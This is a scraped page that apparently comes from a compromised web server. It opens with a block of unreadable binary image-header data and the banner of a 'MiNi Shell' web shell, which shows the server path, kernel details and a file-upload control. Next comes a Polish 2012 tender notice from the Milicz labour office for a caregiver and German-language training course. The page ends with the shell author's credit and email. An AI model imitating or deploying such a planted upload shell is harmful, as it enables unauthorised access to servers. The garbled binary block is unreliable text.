JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120723/264678-N-2012.html

<p class="kh_header"><b>Milicz: Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie
szkolenia w formie kursu dla 10 osób bezrobotnych zarejestrowanych w
Powiatowym Urzędzie Pracy w Miliczu pn. Opiekunka osób starszych i
niepełnosprawnych z nauką języka niemieckiego oraz 2 - tygodniową
praktyką</b><br>
<b>Numer ogłoszenia: 264678 - 2012; data zamieszczenia: 23.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Miliczu , ul. Wojska Polskiego 40, 56-300 Milicz, woj. dolnośląskie, tel. 0-71 384 20 41, 384 29 89, faks 0-71 384 20 41 wew. 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupmilicz.samorzady.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie
szkolenia w formie kursu dla 10 osób bezrobotnych zarejestrowanych w
Powiatowym Urzędzie Pracy w Miliczu pn. Opiekunka osób starszych i
niepełnosprawnych z nauką języka niemieckiego oraz 2 - tygodniową
praktyką.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia.

    Kod CPV - 80500000-9 Usługi szkoleniowe
    Kod CPV - 80580000-3 Oferowanie kursów językowych
1.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia grupowego w formie kursu pn. Opiekunka osób starszych i niepełnosprawnych z nauką języka niemieckiego oraz 2 - tygodniową praktyką  dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Miliczu.
2.	Program szkolenia winien być opracowany w oparciu o standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne w bazach danych prowadzonych przez Ministra Pracy i Polityki Społecznej (www.standardyiszkolenia.praca.gov.pl). W szczególności musi zawierać następujące bloki tematyczne:
1)	w zakresie opieki nad osobami starszych i niepełnosprawnymi:
a)	bezpieczeństwo i higiena pracy w zawodzie opiekunki
b)	anatomia i fizjologia człowieka
       c)  proces starzenia się organizmu człowieka
d)	pielęgnacja osób chorych ( profilaktyka odleżyn)
e)	zasady żywienia osób starszych i chorych
f)	zagadnienia z psychologii społecznej (współpraca z rodziną i środowiskiem  podopiecznego)
g)	zasady udzielania pierwszej pomocy przedmedycznej
h)	organizowanie czasu i dotrzymywanie towarzystwa podopiecznemu
2)	zagadnienia z zakresu nauki języka niemieckiego
a)	słownictwo i wyrażenia związane z pracą na stanowisku opiekunki
b)	zwroty przydatne w życiu codziennym
c)	zagadnienia gramatyczne
d)	nauka pisania CV i listu motywacyjnego
e)	symulacje rozmów kwalifikacyjnych
3.	Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników szkolenia do pracy w zawodzie opiekunki osób starszych i niepełnosprawnych oraz nauka języka niemieckiego w stopniu podstawowym ze szczególnym uwzględnieniem słownictwa z zakresu opieki nad osobami starszymi i niepełnosprawnymi z naciskiem na komunikowanie się. 
4.	Szkolenie w formie kursu w wymiarze 230 godzin zegarowych ( 100 godzin języka niemieckiego, 80 godzin praktyki z zakresu opieki nad osobami starszymi i niepełnosprawnymi, 50 godzin teorii) powinno odbywać się w systemie codziennym w dniach od poniedziałku do piątku w godzinach 7.00-15.00 lub 8.00-16.00 i trwać nie dłużej niż 8 godzin zegarowych dziennie, w wymiarze minimum 25 godzin tygodniowo. Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę i dni ustawowo wolne od pracy.
5.	Godzina zegarowa to 60 minut obejmująca 45 minut zajęć edukacyjnych oraz średnio 15 minut przerwy, gdyż długość przerw może być ustalana w sposób elastyczny. 
6.	Wykonawca  jest  zobowiązany  do  zapewnienia  każdemu  uczestnikowi szkolenia niezbędnych  materiałów dydaktycznych tj. - 1 podręcznika do nauki języka niemieckiego i 1 zeszytu ćwiczeń, 1 słownika niemiecko-polskiego, polsko niemieckiego zawierającego co najmniej 80 000 wyrazów hasłowych oraz 1 podręcznika do zajęć teoretycznych z zakresu  opieki nad osobami starszymi i niepełnosprawnymi, a także zestawu przyborów piśmienniczych (notatnik, długopis, ołówek i zakreślacz). Materiały, podręczniki oraz słownik, które otrzyma każdy uczestnik szkolenia na własność powinny być nowe. Komplet materiałów winien zostać przekazany uczestnikom szkolenia w pierwszym dniu zajęć za pisemnym potwierdzeniem otrzymania w/w materiałów i podręczników. Każdy uczestnik szkolenia musi otrzymać na własność odzież ochronną (fartuch, obuwie, rękawiczki jednorazowe) do odbywania zajęć praktycznych.
7.	Wykonawca musi zapewnić dostęp do sanitariatów wyposażonych w bieżącą wodę (zimną i ciepłą), a toalety muszą być zaopatrzone w odpowiednie środki higieniczne (papier toaletowy, mydło, ręczniki papierowe).
8.	Wymagane jest aby szkolenie miało charakter aktywny, wymagający zaangażowania wszystkich uczestników szkolenia.
9.	Wykonawca zapewni miejsce praktyk np. w domach pomocy społecznej, hospicjach lub placówkach zajmujących się opieką osób starszych i/lub niepełnosprawnych dla wszystkich uczestników szkolenia w ramach realizowanego zamówienia przez okres 2 tygodni, po 8 godzin zegarowych dziennie od poniedziałku do piątku. Wykonawca musi wskazać nazwą i adres instytucji, w której będzie przeprowadzana praktyka. - załącznik nr 1 a do SIWZ. 
Przez określenie praktyki Zamawiający rozumie odbycie praktyk we wskazanych przez Wykonawcę placówkach polegających na możliwości zastosowania w praktyce wiedzy i umiejętności zdobytych przez uczestników szkolenia w trakcie zajęć teoretycznych.
10.	Miejsce organizacji szkolenia (zajęcia teoretyczne i nauka języka niemieckiego) - miasto Milicz.


    

    11.  Zamawiający dopuszcza zorganizowanie zajęć praktycznych poza miastem Milicz w miejscowości oddalonej maksymalnie do 60 km. Wykonawca w takim przypadku 
           musi zapewnić (dla całej grupy uczestników) codzienny zorganizowany transport (np. bus): z Milicza do miejsca odbywania zajęć praktycznych oraz transport powrotny do Milicza. Koszt przejazdu należy wykazać w preliminarzu kosztów.
    12.  Termin realizacji zamówienia: 03.09.2012 r. - 19.10.2012 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.58.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 19.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca  wykaże, że posiada aktualny wpis instytucji szkoleniowej do rejestru instytucji szkoleniowych, prowadzonego  przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej. Zamawiający będzie dokonywał oceny spełnienia warunków na podstawie złożonych oświadczeń i dokumentów potwierdzających ich spełnienie zgodnie z formułą spełnia/nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż  w okresie ostatnich 3 lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie usługi szkoleniowe w formie kursu, w wyniku których przeszkolonych zostało minimum 20 osób (tylko kursy z zakresu opieki nad osobami starszymi i/lub niepełnosprawnymi) z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie.Zamawiający będzie dokonywał oceny spełnienia warunków na podstawie złożonych oświadczeń i dokumentów potwierdzających ich spełnienie zgodnie z formułą spełnia/nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż na czas zajęć teoretycznych i nauki języka niemieckiego zapewni salę wykładową dostosowaną do wielkości grupy z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki, wyposażoną w co  najmniej:
a)	stoliki w ilości dostosowanej do liczby osób uczestniczących w szkoleniu
b)	10 miejsc siedzących
c)	tablica lub flipchart z zapasem kartek
d)	rzutnik multimedialny
e)	ekran projekcyjny
Zamawiający będzie dokonywał oceny spełnienia warunków na podstawie złożonych oświadczeń i dokumentów potwierdzających ich spełnienie zgodnie z formułą spełnia/nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, iż
a)	dysponuje lub będzie dysponował co najmniej 1 osobą do przeprowadzenia  zajęć teoretycznych posiadającą doświadczenie w przeprowadzaniu szkoleń o tematyce przedmiotu zamówienia - minimum 2 szkolenia grupowe przeprowadzone  i zakończone
b)	dysponuje lub będzie dysponował co najmniej 1 osobą do przeprowadzenia   zajęć praktycznych, która będzie  uczestniczyć w wykonywaniu zamówienia oraz spełnia łącznie następujące wymagania: 
-	posiada co najmniej wykształcenie średnie pielęgniarskie oraz minimum 
            3-letnie doświadczenie w pracy z osobami starszymi /niepełnosprawnymi
c)	dysponuje lub będzie dysponował co najmniej 1 wykładowcą do   przeprowadzenia zajęć z języka niemieckiego, która będzie  uczestniczyć w wykonywaniu zamówienia oraz spełnia łącznie następujące wymagania: 
-	posiada wykształcenie wyższe o kierunku filologia germańska 
-	posiada przygotowanie pedagogiczne.
Zamawiający będzie dokonywał oceny spełnienia warunków na podstawie złożonych oświadczeń i dokumentów potwierdzających ich spełnienie zgodnie z formułą spełnia/nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym wypadku zamawiający poprzestaje na ogólnym sformułowaniu warunku. Zamawiający będzie dokonywał oceny spełnienia warunków na podstawie złożonych oświadczeń i dokumentów potwierdzających ich spełnienie zgodnie z formułą spełnia/nie spełnia. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- pełnomocnictwo
- program szkolenia, 
- preliminarz kosztów, 
- zaparafowany wzór umowy
- harmonogram szkolenia 
- oświadczenie o praktykach</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - certyfikat jakości usług - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w przypadku:
1)	gdy osoba szkoląca się przerwie szkolenie w trakcie jego trwania, Wykonawcy   przysługuje częściowe wynagrodzenie, w wysokości proporcjonalnej do  ilości godzin uczestnictwa tej osoby w szkoleniu (przeliczone wg stawki za  osobogodzinę).
2)	zaistnienia okoliczności uniemożliwiających przeprowadzenie zajęć osobom wskazanym przez Wykonawcę w ofercie na skutek:  zwolnienia lekarskiego,  wypowiedzenia umowy o pracę, umowy cywilno-prawnej, zgonu.
Wykonawca ma obowiązek zapewnienia osób na zastępstwo o równorzędnych kwalifikacjach.
3)	zaistnienia nieprzewidzianych okoliczności uniemożliwiających przeprowadzenie  zajęć w miejscu lub terminie wskazanym przez Wykonawcę w ofercie.
Wykonawca ma obowiązek zapewnienia realizacji przedmiotu zamówienia w  równoważnym miejscu lub terminie uzgodnionym z Zamawiającym.
4)	 zaistnienia okoliczności niezależnych od Zamawiającego, uniemożliwiających rozpoczęcie szkolenia przez maksymalną liczbę osób, w przypadku m.in.: zwolnienia lekarskiego, przeciwwskazań lekarskich do wykonywania zawodu, niezgłoszenia się po skierowanie, podjęcia pracy przez bezrobotnego, w sytuacji gdy nie ma możliwości skierowania kolejnej osoby.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupmilicz.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Miliczu
ul. Wojska Polskiego 40
56-300 Milicz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.08.2012 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Miliczu
ul. Wojska Polskiego 40
56-300 Milicz
I piętro, pok. 2.4(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com